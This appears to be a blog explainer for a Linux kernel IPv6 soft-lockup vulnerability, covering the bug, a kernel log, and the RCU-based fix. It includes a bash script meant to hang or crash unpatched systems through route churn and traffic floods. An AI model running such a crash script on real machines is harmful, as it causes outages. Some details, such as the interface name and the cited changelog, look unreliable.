CVE CyberSecurity Database News

CVE-2024-56703 - Linux Kernel IPv6 fib6_select_path Soft Lockup Vulnerability Explained

Poster -

CVE-2024-56703 is a critical vulnerability that affected the Linux kernel’s IPv6 routing system. In certain high-load, dynamic environments—like edge routers handling constant BGP route updates—this flaw could cause a "soft lockup" leading to severe performance degradation, system panics, and unexpected outages.

This exclusive deep dive explains what went wrong, provides reference links, demonstrates how to trigger the bug, and shows how kernel developers fixed the problem using RCU (Read-Copy-Update) primitives.

What Is CVE-2024-56703?

Linux-based routers, especially those using bird to manage BGP routing, frequently update IPv6 routes. Under such churn, the kernel’s fib6_select_path function sometimes got stuck while looping over a circular linked list of “siblings.” If a route was deleted on another CPU during this process, the code could end up in an infinite loop, consuming CPU and eventually hitting a watchdog timeout (soft lockup).

CPU 1 is traversing the list in fib6_select_path.

- CPU 2 deletes a node, making its next and prev pointers point to itself (a typical sign of removal).

Real-World Example: Edge Router Kernel Log

[...]
-- <IRQ stack> --
[exception RIP: fib6_select_path+299]
    RIP: ffffffff8ddafe7b  RSP: ffffbd13003d37b8  RFLAGS: 00000287
    RAX: ffff975850b43600  RBX: ffff975850b40200  [...]
[...]
25 [ffffbd13003d3e40] __do_softirq at ffffffff8df352e9
26 [ffffbd13003d3eb] run_ksoftirqd at ffffffff8ceffe47
[...]

This points directly to the problematic traversal in fib6_select_path(), which never returns.

Here's the core bug in simplified pseudo-C form

// Old code before RCU
struct fib6_info *f6i;
list_for_each_entry(f6i, &rt->fib6_siblings, fib6_siblings) {
    // use f6i
    if (condition)
        break;
}

If another thread deletes f6i, the pointers can turn circular and trap the loop forever.

Key kernel source file: net/ipv6/ip6_fib.c

The Fix: Using RCU

RCU is a kernel primitive for safe concurrent reading/updating. The solution is to annotate access with RCU-safe APIs, ensuring the loop either skips deleted entries, or waits until deletions complete:

// After patch: lockless, safe list traversal
struct fib6_info *f6i;
rcu_read_lock();
list_for_each_entry_rcu(f6i, &rt->fib6_siblings, fib6_siblings) {
    // safely access f6i
    if (condition)
        break;
}
rcu_read_unlock();

Reference:
- Commit in net/ipv6/ip6_fib.c fixing cvE-2024-56703
- RCU List Traversal API

Result:
Now, even if another CPU deletes a route, traversal either skips it or waits until it's safe, preventing infinite loops.

This basic bash script triggers the bug on an unpatched kernel by

- Continuously adding/deleting IPv6 routes
- Using iperf3 to blast IPv6 traffic

Warning: This will freeze or crash the test system! DON’T run in production.

#!/bin/bash

# Requires iperf3 and root access

set -e

TARGET=2001:db8::2 # replace with valid IPv6 peer
IP_PREFIX=2001:db8:100::/64

# Start iperf3 in server mode somewhere else:
# iperf3 -s -D

# Infinite loop: generate heavy route churn
while true; do
    # Add & delete 100 next-hop routes quickly
    for i in $(seq 1 100); do
        ip -6 route add ${IP_PREFIX} via $TARGET dev eth metric $i || true
    done
    for i in $(seq 1 100); do
        ip -6 route del ${IP_PREFIX} via $TARGET dev eth metric $i || true
    done
done &

# In parallel, generate IPv6 traffic
for c in {1..10}; do
    iperf3 -6 -c $TARGET -t 600 -P 10 &
done

wait

Within a few minutes, expect the system to hang or kernel panic if unpatched.

Responsible Disclosure and References

- Patch commit: net/ipv6: Fix soft lockups in fib6_select_path (kernel.org)
- Kernel Release Note: Linux 6.9 changelog
- Bird routing daemon: https://bird.network.cz/
- RCU Documentation: What is RCU?

Check your distribution’s advisories

- Debian: security tracker
- Red Hat: CVE Tracker
- Ubuntu: CVE Tracker

Summary

- CVE-2024-56703 allowed a race condition in Linux IPv6 route multipath handling, causing fatal soft lockups on busy routers.

Stay safe, keep your system updated!

*If you found this exclusive write-up helpful, share with your Linux network admin friends. For more CVEs explained in plain English, stay tuned!*

Timeline

Published on: 12/28/2024 10:15:18 UTC
Last modified on: 02/02/2025 11:15:12 UTC